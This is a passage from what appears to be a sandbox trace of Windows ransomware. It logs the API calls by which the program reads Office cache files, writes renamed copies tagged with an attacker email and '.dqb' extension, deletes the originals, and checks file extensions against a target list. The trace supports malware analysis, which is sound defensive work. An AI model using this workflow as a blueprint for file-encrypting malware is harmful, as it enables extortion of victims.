Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.671] lstrlenW (lpString=".1cd") returned 4 [0044.671] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0044.671] lstrlenW (lpString=".jpg") returned 4 [0044.671] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.672] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0044.672] lstrlenW (lpString="OfficeMUISet.msi") returned 16 [0044.672] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.672] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=868864) returned 1 [0044.672] CloseHandle (hObject=0x20c) returned 1 [0044.672] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 0x2020 [0044.672] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.672] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.672] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.672] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.672] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0044.679] GetLastError () returned 0x0 [0044.679] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0044.797] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0044.814] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.814] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0044.814] SetEndOfFile (hFile=0x214) returned 1 [0044.814] CloseHandle (hObject=0x214) returned 1 [0044.814] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.814] SetEndOfFile (hFile=0x20c) returned 1 [0044.821] CloseHandle (hObject=0x20c) returned 1 [0044.821] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.822] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1 [0044.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.822] lstrlenW (lpString=".doc") returned 4 [0044.822] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.822] lstrlenW (lpString=".docx") returned 5 [0044.822] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0044.822] lstrlenW (lpString=".pdf") returned 4 [0044.822] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.822] lstrlenW (lpString=".xls") returned 4 [0044.822] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.822] lstrlenW (lpString=".xlsx") returned 5 [0044.822] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0044.822] lstrlenW (lpString=".ppt") returned 4 [0044.822] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.822] lstrlenW (lpString=".zip") returned 4 [0044.822] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.822] lstrlenW (lpString=".rar") returned 4 [0044.822] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.822] lstrlenW (lpString=".bz2") returned 4 [0044.822] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.822] lstrlenW (lpString=".7z") returned 3 [0044.822] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.822] lstrlenW (lpString=".dbf") returned 4 [0044.823] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.823] lstrlenW (lpString=".1cd") returned 4 [0044.823] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.823] lstrlenW (lpString=".jpg") returned 4 [0044.823] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.823] lstrlenW (lpString=".doc") returned 4 [0044.823] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.823] lstrlenW (lpString=".docx") returned 5 [0044.823] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0044.823] lstrlenW (lpString=".pdf") returned 4 [0044.823] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.823] lstrlenW (lpString=".xls") returned 4 [0044.823] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.823] lstrlenW (lpString=".xlsx") returned 5 [0044.823] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0044.823] lstrlenW (lpString=".ppt") returned 4 [0044.823] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.823] lstrlenW (lpString=".zip") returned 4 [0044.823] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.823] lstrlenW (lpString=".rar") returned 4 [0044.823] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.823] lstrlenW (lpString=".bz2") returned 4 [0044.823] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.823] lstrlenW (lpString=".7z") returned 3 [0044.823] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.823] lstrlenW (lpString=".dbf") returned 4 [0044.823] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.823] lstrlenW (lpString=".1cd") returned 4 [0044.824] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.824] lstrlenW (lpString=".jpg") returned 4 [0044.824] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.824] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0044.824] lstrlenW (lpString="osetupui.dll") returned 12 [0044.824] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.824] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=191872) returned 1 [0044.824] CloseHandle (hObject=0x20c) returned 1 [0044.824] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 0x2020 [0044.824] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.824] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.824] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.825] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.825] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0044.825] GetLastError () returned 0x0 [0044.825] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x2ed80, lpOverlapped=0x0) returned 1 [0044.888] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x2ed90, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x2ed90, lpOverlapped=0x0) returned 1 [0044.892] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.892] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.892] SetEndOfFile (hFile=0x214) returned 1 [0044.892] CloseHandle (hObject=0x214) returned 1 [0044.892] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.892] SetEndOfFile (hFile=0x20c) returned 1 [0044.894] CloseHandle (hObject=0x20c) returned 1 [0044.894] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.894] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 1 [0044.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.894] lstrlenW (lpString=".doc") returned 4 [0044.894] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.894] lstrlenW (lpString=".docx") returned 5 [0044.894] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0044.894] lstrlenW (lpString=".pdf") returned 4 [0044.894] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.894] lstrlenW (lpString=".xls") returned 4 [0044.894] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.894] lstrlenW (lpString=".xlsx") returned 5 [0044.894] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0044.894] lstrlenW (lpString=".ppt") returned 4 [0044.894] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.895] lstrlenW (lpString=".zip") returned 4 [0044.895] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString=".rar") returned 4 [0044.895] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString=".bz2") returned 4 [0044.895] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.895] lstrlenW (lpString=".7z") returned 3 [0044.895] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.895] lstrlenW (lpString=".dbf") returned 4 [0044.895] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.895] lstrlenW (lpString=".1cd") returned 4 [0044.895] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.895] lstrlenW (lpString=".jpg") returned 4 [0044.895] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.895] lstrlenW (lpString=".doc") returned 4 [0044.895] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString=".docx") returned 5 [0044.895] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0044.895] lstrlenW (lpString=".pdf") returned 4 [0044.895] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString=".xls") returned 4 [0044.895] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString=".xlsx") returned 5 [0044.895] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0044.895] lstrlenW (lpString=".ppt") returned 4 [0044.895] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.895] lstrlenW (lpString=".zip") returned 4 [0044.895] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0044.895] lstrlenW (lpString=".rar") returned 4 [0044.896] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0044.896] lstrlenW (lpString=".bz2") returned 4 [0044.896] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0044.896] lstrlenW (lpString=".7z") returned 3 [0044.896] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0044.896] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.896] lstrlenW (lpString=".dbf") returned 4 [0044.896] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0044.896] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.896] lstrlenW (lpString=".1cd") returned 4 [0044.896] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0044.896] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0044.896] lstrlenW (lpString=".jpg") returned 4 [0044.896] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0044.896] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0044.896] lstrlenW (lpString="AccLR.cab") returned 9 [0044.896] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.896] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=28016276) returned 1 [0044.896] CloseHandle (hObject=0x20c) returned 1 [0044.896] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab")) returned 0x2020 [0044.897] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.897] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0044.947] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.947] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.947] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.947] ReadFile (in: hFile=0x20c, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.054] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.054] ReadFile (in: hFile=0x20c, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.081] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.081] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.081] ReadFile (in: hFile=0x20c, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.262] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.262] WriteFile (in: hFile=0x20c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0045.279] SetEndOfFile (hFile=0x20c) returned 1 [0045.280] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fc24e0 [0045.283] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.283] WriteFile (in: hFile=0x20c, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.284] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.284] WriteFile (in: hFile=0x20c, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.287] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.287] WriteFile (in: hFile=0x20c, lpBuffer=0x3fc24e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc24e0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.288] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fc24e0 | out: hHeap=0x570000) returned 1 [0045.288] CloseHandle (hObject=0x20c) returned 1 [0045.289] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.289] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.289] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.289] lstrlenW (lpString=".doc") returned 4 [0045.289] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.289] lstrlenW (lpString=".docx") returned 5 [0045.289] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.289] lstrlenW (lpString=".pdf") returned 4 [0045.289] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.289] lstrlenW (lpString=".xls") returned 4 [0045.289] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.289] lstrlenW (lpString=".xlsx") returned 5 [0045.289] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.289] lstrlenW (lpString=".ppt") returned 4 [0045.289] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.289] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.289] lstrlenW (lpString=".zip") returned 4 [0045.289] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.289] lstrlenW (lpString=".rar") returned 4 [0045.289] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.289] lstrlenW (lpString=".bz2") returned 4 [0045.289] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.289] lstrlenW (lpString=".7z") returned 3 [0045.289] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0045.290] lstrlenW (lpString=".dbf") returned 4 [0045.290] lstrcmpiW (lpString1=".dbf", 